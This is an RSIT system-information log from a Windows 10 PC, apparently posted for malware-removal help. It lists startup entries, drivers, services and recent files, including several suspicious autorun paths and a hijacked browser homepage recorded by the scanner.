Logfile of random's system information tool 1.10 (written by random/random)
Run by 42072 at 2020-10-20 21:26:40
Microsoft Windows 10 Pro
System drive C: has 306 GB (64%) free of 476 GB
Total RAM: 3071 MB (75% free)
HijackThis download failed
======Scheduled tasks folder======
C:\WINDOWS\tasks\CreateExplorerShellUnelevatedTask.job - C:\WINDOWS\explorer.exe /NOUACCHECK
=========Mozilla firefox=========
ProfilePath - C:\Users\42072\AppData\Roaming\Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342
prefs.js - "browser.startup.homepage" - "https://securesearch.org/homepage?hp=2& ... 2020-09-11 04:31:44&bName="
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/DTPlugin,version=11.261.2]
"Description"=Java™ Deployment Toolkit
"Path"=C:\Program Files\Java\jre1.8.0_261\bin\dtplugin\npDeployJava1.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/JavaPlugin,version=11.261.2]
"Description"=Oracle® Next Generation Java™ Plug-In
"Path"=C:\Program Files\Java\jre1.8.0_261\bin\plugin2\npjp2.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/Lync,version=15.0]
"Description"=Skype for Business Plug-in for Firefox
"Path"=C:\Program Files\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/SharePoint,version=14.0]
"Description"=Microsoft SharePoint Plug-in for Firefox
"Path"=C:\PROGRA~1\MICROS~1\Office16\NPSPWRAP.DLL
C:\Program Files\Mozilla Firefox\plugins\
npMeetingJoinPluginOC.dll
C:\Users\42072\AppData\Roaming\Mozilla\Firefox\Profiles\h2n5v0bu.default-release-1570206046342\searchplugins\
yahoo.xml
======Registry dump======
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}]
IEToEdge BHO - C:\Program Files\Microsoft\Edge\Application\86.0.622.43\BHO\ie_to_edge_bho.dll [2020-10-14 398224]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}]
Skype for Business Browser Helper - C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2015-07-31 161448]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files\Java\jre1.8.0_261\bin\ssv.dll [2020-10-10 618152]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF}]
Microsoft OneDrive for Business Browser Helper - C:\PROGRA~1\MICROS~1\Office16\GROOVEEX.DLL [2015-07-31 1512152]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre1.8.0_261\bin\jp2ssv.dll [2020-10-10 281768]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"=C:\WINDOWS\system32\SecurityHealthSystray.exe [2019-12-07 74752]
"StartCCC"=C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\x86\CLIStart.exe [2015-11-04 748744]
"LogMeIn Hamachi Ui"=C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe [2019-04-02 5890504]
"seznam-listicka-distribuce"=C:\Program Files\Seznam.cz\distribution\szninstall.exe [2018-03-27 1069296]
"LogiOptions"=C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [2020-04-27 1718408]
"Reflect UI"=C:\Program Files\Macrium\Common\ReflectUI.exe [2020-08-05 6131976]
"DiskFixer"=C:\Program Files\DiskFixer\DiskFixer.exe [2019-07-04 247808]
"Launch LCore"=C:\Program Files\Logitech Gaming Software\LCore.exe [2018-05-07 13868168]
"SunJavaUpdateSched"=C:\Program Files\Common Files\Java\Java Update\jusched.exe [2020-06-18 710264]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"DAEMON Tools Lite Automount"=C:\Program Files\DAEMON Tools Lite\DTAgent.exe [2020-03-19 365672]
"EpicGamesLauncher"=C:\Program Files\Epic Games\Launcher\Portal\Binaries\Win32\EpicGamesLauncher.exe [2020-07-03 26028432]
"Spotify"=C:\Users\42072\AppData\Roaming\Spotify\Spotify.exe [2020-07-05 23220456]
"Mobigame Playstore"=C:\Program Files\MobiGame\playstore\playstore.exe [2020-08-28 135680]
"MuddyGlade"=C:\WINDOWS\rss\csrss.exe [2020-09-27 4080640]
"Web Companion"=C:\Program Files\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize []
"rfxgnkvq"=C:\Users\42072\izhfpkrf.exe []
"CloudNet"=C:\Users\42072\AppData\Roaming\16f618eaf6a0\16f618eaf6a0.exe [2020-10-20 549376]
"Steam"=C:\Program Files\Steam\steam.exe [2020-10-15 3416352]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Ahcache.sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AudioEndpointBuilder]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AudioSrv]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CBDHSvc]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CoreMessagingRegistrar]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HdAudAddService.Sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HdAudBus.Sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\iai2c.sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\iaioi2c.sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\NgcCtnrSvc]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\NgcSvc]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SerCx2.sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SpbCx.sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\StateRepository]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\uefi.sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\usbaudio.sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\UserManager]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96C-E325-11CE-BFC1-08002BE10318}]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{F2E7DD72-6468-4E36-B6F1-6488F42C1B52}]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\Ahcache.sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AudioEndpointBuilder]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AudioSrv]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\CBDHSvc]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\CoreMessagingRegistrar]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\HdAudAddService.Sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\HdAudBus.Sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\MsQuic]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\NetSetupSvc]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\NgcCtnrSvc]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\NgcSvc]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\SerCx2.sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\SpbCx.sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\StateRepository]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\uefi.sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\usbaudio.sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\UserManager]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\{4D36E96C-E325-11CE-BFC1-08002BE10318}]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\{F2E7DD72-6468-4E36-B6F1-6488F42C1B52}]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DSCAutomationHostEnabled"=2
"EnableFullTrustStartupTasks"=2
"EnableUwpStartupTasks"=2
"SupportFullTrustStartupTasks"=1
"SupportUwpStartupTasks"=1
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"aux"=wdmaud.drv
"midi"=wdmaud.drv
"midimapper"=midimap.dll
"mixer"=wdmaud.drv
"msacm.imaadpcm"=imaadp32.acm
"msacm.msadpcm"=msadp32.acm
"msacm.msg711"=msg711.acm
"msacm.msgsm610"=msgsm32.acm
"vidc.cvid"=iccvid.dll
"vidc.i420"=iyuv_32.dll
"vidc.iyuv"=iyuv_32.dll
"vidc.mrle"=msrle32.dll
"vidc.msvc"=msvidc32.dll
"vidc.uyvy"=msyuv.dll
"vidc.yuy2"=msyuv.dll
"vidc.yvu9"=tsbyuv.dll
"vidc.yvyu"=msyuv.dll
"wave"=wdmaud.drv
"wavemapper"=msacm32.drv
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"VIDC.FPS1"=frapsvid.dll
"aux1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"wave1"=wdmaud.drv
"aux2"=wdmaud.drv
"midi2"=wdmaud.drv
"mixer2"=wdmaud.drv
"wave2"=wdmaud.drv
"aux3"=wdmaud.drv
"midi3"=wdmaud.drv
"mixer3"=wdmaud.drv
"wave3"=wdmaud.drv
"MSVideo8"=VfWWDM32.dll
"aux4"=wdmaud.drv
"midi4"=wdmaud.drv
"mixer4"=wdmaud.drv
"wave4"=wdmaud.drv
"aux5"=wdmaud.drv
"midi5"=wdmaud.drv
"mixer5"=wdmaud.drv
"wave5"=wdmaud.drv
"aux6"=wdmaud.drv
"midi6"=wdmaud.drv
"mixer6"=wdmaud.drv
"wave6"=wdmaud.drv
"aux7"=wdmaud.drv
"midi7"=wdmaud.drv
"mixer7"=wdmaud.drv
"wave7"=wdmaud.drv
======File associations======
.inf - install -
.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*
======List of files/folders created in the last 1 month======
2020-10-20 21:26:41 ----D---- C:\Program Files\trend micro
2020-10-20 21:26:40 ----D---- C:\rsit
2020-10-20 16:51:25 ----D---- C:\WINDOWS\pss
2020-10-20 16:38:24 ----D---- C:\Program Files\ESET
2020-10-20 16:03:01 ----A---- C:\WINDOWS\system32\drivers\mbae.sys
2020-10-20 16:02:55 ----D---- C:\ProgramData\Malwarebytes
2020-10-20 16:00:59 ----D---- C:\Program Files\Malwarebytes
2020-10-12 12:04:08 ----D---- C:\Users\42072\AppData\Roaming\EasyAntiCheat
2020-10-12 12:03:30 ----D---- C:\Program Files\EasyAntiCheat
2020-10-11 11:33:01 ----D---- C:\Program Files\Common Files\Steam
2020-10-11 11:32:50 ----D---- C:\Program Files\Steam
2020-10-10 18:11:33 ----D---- C:\Program Files\Common Files\Oracle
2020-10-10 18:10:40 ----D---- C:\Program Files\Common Files\Java
2020-09-27 15:04:44 ----D---- C:\WINDOWS\system32\directx
2020-09-26 19:45:02 ----D---- C:\Program Files\Serious Sam 3 BFE
2020-09-25 18:13:06 ----D---- C:\Program Files\directx
2020-09-25 17:57:17 ----A---- C:\WINDOWS\system32\drivers\SECDRV.SYS
2020-09-25 17:54:36 ----D---- C:\Program Files\GameSpy Arcade
2020-09-25 17:51:41 ----D---- C:\Program Files\Croteam
2020-09-25 17:35:17 ----D---- C:\ProgramData\Magix
2020-09-25 17:35:14 ----D---- C:\Users\42072\AppData\Roaming\VEGAS
======List of files/folders modified in the last 1 month======
2020-10-20 21:26:41 ----RD---- C:\Program Files
2020-10-20 21:21:56 ----D---- C:\WINDOWS\System32
2020-10-20 21:21:56 ----D---- C:\WINDOWS\INF
2020-10-20 21:21:56 ----A---- C:\WINDOWS\system32\PerfStringBackup.INI
2020-10-20 21:18:15 ----D---- C:\WINDOWS\Tasks
2020-10-20 21:17:45 ----ASH---- C:\DumpStack.log.tmp
2020-10-20 21:17:18 ----D---- C:\WINDOWS\system32\sru
2020-10-20 21:16:54 ----D---- C:\WINDOWS\Temp
2020-10-20 21:16:53 ----D---- C:\WINDOWS\Prefetch
2020-10-20 16:56:20 ----D---- C:\ProgramData\regid.1991-06.com.microsoft
2020-10-20 16:51:25 ----D---- C:\Windows
2020-10-20 16:46:16 ----SHD---- C:\WINDOWS\Installer
2020-10-20 16:46:14 ----HD---- C:\ProgramData
2020-10-20 16:40:18 ----D---- C:\WINDOWS\AppReadiness
2020-10-20 16:26:54 ----D---- C:\WINDOWS\system32\Tasks
2020-10-20 16:15:31 ----D---- C:\WINDOWS\system32\drivers
2020-10-20 15:55:36 ----D---- C:\WINDOWS\system32\SleepStudy
2020-10-20 11:52:40 ----D---- C:\WINDOWS\Logs
2020-10-20 11:48:52 ----RD---- C:\WINDOWS\Microsoft.NET
2020-10-18 19:49:07 ----D---- C:\Users\42072\AppData\Roaming\.minecraft
2020-10-18 19:02:32 ----D---- C:\Users\42072\AppData\Roaming\lunarclient
2020-10-17 12:40:25 ----HD---- C:\Program Files\WindowsApps
2020-10-15 19:53:20 ----D---- C:\Program Files\Mozilla Firefox
2020-10-14 20:43:29 ----D---- C:\Program Files\R.G. Mechanics
2020-10-14 20:33:14 ----D---- C:\Users\42072\AppData\Roaming\Spotify
2020-10-12 11:39:15 ----D---- C:\ProgramData\Package Cache
2020-10-11 11:33:01 ----D---- C:\Program Files\Common Files
2020-10-10 18:34:52 ----D---- C:\WINDOWS\system32\config
2020-10-10 18:11:35 ----D---- C:\Program Files\Java
2020-10-10 18:08:44 ----A---- C:\WINDOWS\system32\WindowsAccessBridge.dll
2020-10-10 14:21:06 ----D---- C:\WINDOWS\system32\drivers\wd
2020-10-02 16:15:20 ----D---- C:\Users\42072\AppData\Roaming\TS3Client
2020-09-28 13:34:07 ----D---- C:\WINDOWS\system32\drivers\UMDF
2020-09-28 11:49:29 ----D---- C:\ProgramData\Mozilla
2020-09-26 17:54:39 ----D---- C:\WINDOWS\system32\LogFiles
2020-09-25 18:20:08 ----D---- C:\Program Files\Common Files\InstallShield
2020-09-25 18:19:42 ----HD---- C:\Program Files\InstallShield Installation Information
2020-09-25 17:21:22 ----D---- C:\WINDOWS\system32\catroot2
2020-09-25 17:21:22 ----D---- C:\WINDOWS\system32\CatRoot
2020-09-25 17:19:56 ----D---- C:\Program Files\Logitech Gaming Software
2020-09-25 17:17:30 ----D---- C:\WINDOWS\system32\DriverStore
======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R0 iaStorAVC;@iastorav.inf,%iaStorAVC.DeviceDesc%;Intel Chipset SATA RAID Controller; C:\WINDOWS\System32\drivers\iaStorAVC.sys [2019-12-07 692536]
R0 iorate;@%SystemRoot%\system32\drivers\iorate.sys,-101; C:\WINDOWS\system32\drivers\iorate.sys [2019-12-07 45584]
R0 ItSas35i;ItSas35i; C:\WINDOWS\System32\drivers\ItSas35i.sys [2019-12-07 139792]
R0 LSI_SAS2i;LSI_SAS2i; C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2019-12-07 103440]
R0 LSI_SAS3i;LSI_SAS3i; C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2019-12-07 112656]
R0 megasas2i;megasas2i; C:\WINDOWS\System32\drivers\MegaSas2i.sys [2019-12-07 72208]
R0 megasas35i;megasas35i; C:\WINDOWS\System32\drivers\megasas35i.sys [2019-12-07 87568]
R0 percsas2i;percsas2i; C:\WINDOWS\System32\drivers\percsas2i.sys [2019-12-07 51728]
R0 percsas3i;percsas3i; C:\WINDOWS\System32\drivers\percsas3i.sys [2019-12-07 59408]
R0 Ramdisk;Windows RAM Disk Driver; C:\WINDOWS\system32\DRIVERS\ramdisk.sys [2019-12-07 33808]
R0 storufs;@storufs.inf,%UfsServiceDesc%;Microsoft Universal Flash Storage (UFS) Driver; C:\WINDOWS\System32\drivers\storufs.sys [2019-12-07 45368]
R1 CimFS;CimFS; C:\WINDOWS\system32\drivers\CimFS.sys [2019-12-07 68096]
R3 dtlitescsibus;@oem3.inf,%DisplayName%;DAEMON Tools Lite Virtual SCSI Bus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [2020-03-19 38672]
R3 dtliteusbbus;@oem7.inf,%DisplayName%;DAEMON Tools Lite Virtual USB Bus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [2020-03-19 51680]
R3 LGBusEnum;@oem5.inf,%LGBusEnum.SVCDESC%;Logitech Gaming Virtual Bus Enumerator Driver; C:\WINDOWS\system32\drivers\LGBusEnum.sys [2018-05-07 32912]
R3 LGJoyXlCore;@oem5.inf,%LGJoyXlCore.SVCDESC%;Logitech Translation Layer Driver (LGS); C:\WINDOWS\system32\drivers\LGJoyXlCore.sys [2018-05-07 63632]
S0 MsSecFlt;@%SystemRoot%\System32\Drivers\mssecflt.sys,-1001; C:\WINDOWS\system32\drivers\mssecflt.sys [2020-09-03 210744]
S1 16F618EAF6A0;16F618EAF6A0 service; \??\C:\WINDOWS\16F618EAF6A0.sys [2020-09-11 21784]
S1 afunix;afunix; C:\WINDOWS\system32\drivers\afunix.sys [2019-12-07 29696]
S1 bam;@%SystemRoot%\system32\drivers\bam.sys,-100; C:\WINDOWS\system32\drivers\bam.sys [2019-12-07 69432]
S1 FileCrypt;@%systemroot%\system32\drivers\filecrypt.sys,-100; C:\WINDOWS\system32\drivers\filecrypt.sys [2019-12-07 45568]
S1 GpuEnergyDrv;@%SystemRoot%\system32\drivers\gpuenergydrv.sys,-100; C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2019-12-07 8192]
S1 MobiVBoxDrv;MobiVBox Support Driver; \??\C:\Program Files\MobiGame\vbox\MobiVBoxDrv.sys [2020-08-11 255640]
S2 bindflt;@%systemroot%\system32\drivers\bindflt.sys,-100; C:\WINDOWS\system32\drivers\bindflt.sys [2020-09-03 107320]
S2 CldFlt;Windows Cloud Files Filter Driver; C:\WINDOWS\system32\drivers\cldflt.sys [2020-09-03 378880]
S2 LGCoreTemp;Logitech CPU Core Tempurature; \??\C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [2015-06-21 13672]
S2 MMCSS;@%systemroot%\system32\drivers\mmcss.sys,-100; C:\WINDOWS\system32\drivers\mmcss.sys [2019-12-07 37376]
S2 storqosflt;@%SystemRoot%\System32\drivers\storqosflt.sys,-101; C:\WINDOWS\system32\drivers\storqosflt.sys [2019-12-07 73528]
S3 AcpiDev;@acpidev.inf,%AcpiDev.SvcDesc%;ACPI Devices driver; C:\WINDOWS\System32\drivers\AcpiDev.sys [2019-12-07 15360]
S3 Acx01000;@%SystemRoot%\system32\drivers\Acx01000.sys,-1000; C:\WINDOWS\system32\drivers\Acx01000.sys [2019-12-07 296448]
S3 amdkmdag;amdkmdag; C:\WINDOWS\system32\DRIVERS\atikmdag.sys [2015-12-16 19525104]
S3 amdkmdap;amdkmdap; C:\WINDOWS\system32\DRIVERS\atikmpag.sys [2015-12-16 542192]
S3 applockerfltr;@%systemroot%\system32\srpapi.dll,-102; C:\WINDOWS\system32\drivers\applockerfltr.sys [2019-12-07 13312]
S3 AppvStrm;@%systemroot%\system32\drivers\AppvStrm.sys,-101; C:\WINDOWS\system32\drivers\AppvStrm.sys [2019-12-07 92176]
S3 AppvVemgr;@%systemroot%\system32\drivers\AppvVemgr.sys,-101; C:\WINDOWS\system32\drivers\AppvVemgr.sys [2019-12-07 118072]
S3 AppvVfs;@%systemroot%\system32\drivers\AppvVfs.sys,-101; C:\WINDOWS\system32\drivers\AppvVfs.sys [2019-12-07 111416]
S3 BthA2dp;@microsoft_bluetooth_a2dp.inf,%BthA2dp.ServiceDescription%;Microsoft Bluetooth A2dp driver; C:\WINDOWS\System32\drivers\BthA2dp.sys [2019-12-07 200192]
S3 BthEnum;@bth.inf,%BthEnum.SVCDESC%;Bluetooth Enumerator Service; C:\WINDOWS\System32\drivers\BthEnum.sys [2020-09-03 91136]
S3 BthLEEnum;@bthleenum.inf,%BthLEEnum.SVCDESC%;Bluetooth Low Energy Driver; C:\WINDOWS\System32\drivers\Microsoft.Bluetooth.Legacy.LEEnumerator.sys [2019-12-07 78848]
S3 BthMini;@bth.inf,%BTHMINI.SvcDesc%;Bluetooth Radio Driver; C:\WINDOWS\System32\drivers\BTHMINI.sys [2020-09-03 30720]
S3 BTHPORT;@bth.inf,%BTHPORT.SvcDesc%;Bluetooth Port Driver; C:\WINDOWS\System32\drivers\BTHport.sys [2020-09-03 1165824]
S3 BTHUSB;@bth.inf,%BTHUSB.SvcDesc%;Bluetooth Radio USB Driver; C:\WINDOWS\System32\drivers\BTHUSB.sys [2020-09-03 76288]
S3 buttonconverter;@buttonconverter.inf,%btnconv.SvcDesc%;Service for Portable Device Control devices; C:\WINDOWS\System32\drivers\buttonconverter.sys [2019-12-07 31232]
S3 CAD;@ChargeArbitration.inf,%CAD_DevDesc%;Charge Arbitration Driver; C:\WINDOWS\System32\drivers\CAD.sys [2019-12-07 55608]
S3 genericusbfn;@genericusbfn.inf,%genericusbfn.ServiceName%;Generic USB Function Class; C:\WINDOWS\System32\DriverStore\FileRepository\genericusbfn.inf_x86_9fb34a6bf4965cb2\genericusbfn.sys [2019-12-07 18944]
S3 GPIO;@iaiogpio.inf,%GPIO.SVCDESC%;Intel SoC GPIO Controller Driver; C:\WINDOWS\System32\drivers\iaiogpio.sys [2019-12-07 22016]
S3 Hamachi;@oem11.inf,%Hamachi.Service.DispName%;LogMeIn Hamachi Virtual Miniport); C:\WINDOWS\System32\drivers\Hamdrv.sys [2019-04-02 38512]
S3 hidinterrupt;@hidinterrupt.inf,%HID_Interrupt.SvcDesc%;Common Driver for HID Buttons implemented with interrupts; C:\WINDOWS\System32\drivers\hidinterrupt.sys [2019-12-07 41272]
S3 hidspi;@hidspi_km.inf,%hidspi.SVCDESC%;Microsoft SPI HID Miniport Driver; C:\WINDOWS\System32\drivers\hidspi.sys [2019-12-07 45056]
S3 HwNClx0101;Microsoft Hardware Notifications Class Extension Driver; C:\WINDOWS\System32\Drivers\mshwnclx.sys [2019-12-07 21504]
S3 iagpio;@iagpio.inf,%iagpio.SVCDESC%;Intel Serial IO GPIO Controller Driver; C:\WINDOWS\System32\drivers\iagpio.sys [2019-12-07 28672]
S3 iai2c;@iai2c.inf,%iai2c.SVCDESC%;Intel(R) Serial IO I2C Host Controller; C:\WINDOWS\System32\drivers\iai2c.sys [2019-12-07 73728]
S3 iaioi2c;@iaioi2c.inf,%Driver_Service.Desc%;Intel(R) Atom(TM) Processor I2C Controller Service; C:\WINDOWS\System32\drivers\iaioi2c.sys [2019-12-07 57856]
S3 IndirectKmd;@%SystemRoot%\system32\drivers\IndirectKmd.sys,-100; C:\WINDOWS\System32\drivers\IndirectKmd.sys [2019-12-07 32768]
S3 intelpmax;@intelpmax.inf,%SvcDesc%;Intel(R) Dynamic Device Peak Power Manager Driver; C:\WINDOWS\System32\drivers\intelpmax.sys [2019-12-07 22016]
S3 IPT;IPT; C:\WINDOWS\System32\drivers\ipt.sys [2019-12-07 45368]
S3 LGVirHid;@oem6.inf,%LGVirHid.SVCDESC%;Logitech Gamepanel Virtual HID Device Driver; C:\WINDOWS\system32\drivers\LGVirHid.sys [2018-05-07 24856]
S3 mausbhost;@mausbhost.inf,%MAUSBHost.ServiceName%;MA-USB Host Controller Driver; C:\WINDOWS\System32\drivers\mausbhost.sys [2019-12-07 426808]
S3 mausbip;@mausbhost.inf,%MAUSBIP.ServiceName%;MA-USB IP Filter Driver; C:\WINDOWS\System32\drivers\mausbip.sys [2019-12-07 47632]
S3 MbbCx;MBB Network Adapter Class Extension; C:\WINDOWS\system32\drivers\MbbCx.sys [2020-09-03 296960]
S3 Microsoft_Bluetooth_AvrcpTransport;@microsoft_bluetooth_avrcptransport.inf,%Microsoft_Bluetooth_AvrcpTransport.ServiceDescription%;Microsoft Bluetooth Avrcp Transport Driver; C:\WINDOWS\System32\drivers\Microsoft.Bluetooth.AvrcpTransport.sys [2019-12-07 46080]
S3 MsQuic;@%SystemRoot%\system32\drivers\msquic.sys,-1; C:\WINDOWS\system32\drivers\msquic.sys [2019-12-07 237368]
S3 NetAdapterCx;Network Adapter Wdf Class Extension Library; C:\WINDOWS\system32\drivers\NetAdapterCx.sys [2019-12-07 144896]
S3 NVNET;@netnvm32.inf,%NVENETFD.Service.DispName%;NVIDIA nForce Ethernet Driver; C:\WINDOWS\System32\drivers\nvmf6232.sys [2019-12-07 291456]
S3 PktMon;Packet Monitor Driver; C:\WINDOWS\system32\drivers\PktMon.sys [2019-12-07 87352]
S3 PNPMEM;@memory.inf,%PNPMEM.SvcDesc%;Microsoft Memory Module Driver; C:\WINDOWS\System32\drivers\pnpmem.sys [2019-12-07 13312]
S3 portcfg;portcfg; C:\WINDOWS\System32\drivers\portcfg.sys [2019-12-07 19968]
S3 RFCOMM;@tdibth.inf,%RFCOMM.DisplayName%;Bluetooth Device (RFCOMM Protocol TDI); C:\WINDOWS\System32\drivers\rfcomm.sys [2019-12-07 159744]
S3 rhproxy;@rhproxy.inf,%rhproxy.SVCDESC%;Resource Hub proxy driver; C:\WINDOWS\System32\drivers\rhproxy.sys [2019-12-07 79360]
======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R2 CoreMessagingRegistrar;@%SystemRoot%\system32\coremessaging.dll,-1; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
R3 cbdhsvc_5fd3e;Uživatelská služba schránky_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
R3 NgcCtnrSvc;@%SystemRoot%\System32\NgcCtnrSvc.dll,-1; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
R3 NgcSvc;@%SystemRoot%\System32\ngcsvc.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
R3 StateRepository;@%SystemRoot%\system32\windows.staterepository.dll,-1; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S2 AegLauncher;AegLauncher; C:\Program Files\MobiGame\aeg_launcher.exe [2020-08-28 6312448]
S2 AMD External Events Utility;AMD External Events Utility; C:\WINDOWS\system32\atiesrxx.exe [2015-12-16 223216]
S2 AMD FUEL Service;AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [2015-11-04 284872]
S2 CDPSvc;@%SystemRoot%\system32\cdpsvc.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S2 CDPUserSvc;@%SystemRoot%\system32\cdpusersvc.dll,-100; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S2 CDPUserSvc_5fd3e;Uživatelská služba platformy připojených zařízení_5fd3e; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S2 DiagTrack;@%SystemRoot%\system32\diagtrack.dll,-3001; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S2 DispBrokerDesktopSvc;@%SystemRoot%\system32\dispbroker.desktop.dll,-101; C:\WINDOWS\system32\svchost.exe [2019-12-07 47232]
S2 DoSvc;@%systemroot%\system32\dosvc.dll,-100; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S2 DusmSvc;@%SystemRoot%\System32\dusmsvc.dll,-1; C:\WINDOWS\System32\svchost.exe [2019-12-07 47232]
S2 edgeupdate;Služba Microsoft Edge Update (edgeupdate); C:\Program Files\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe [2020-06-13 224160]
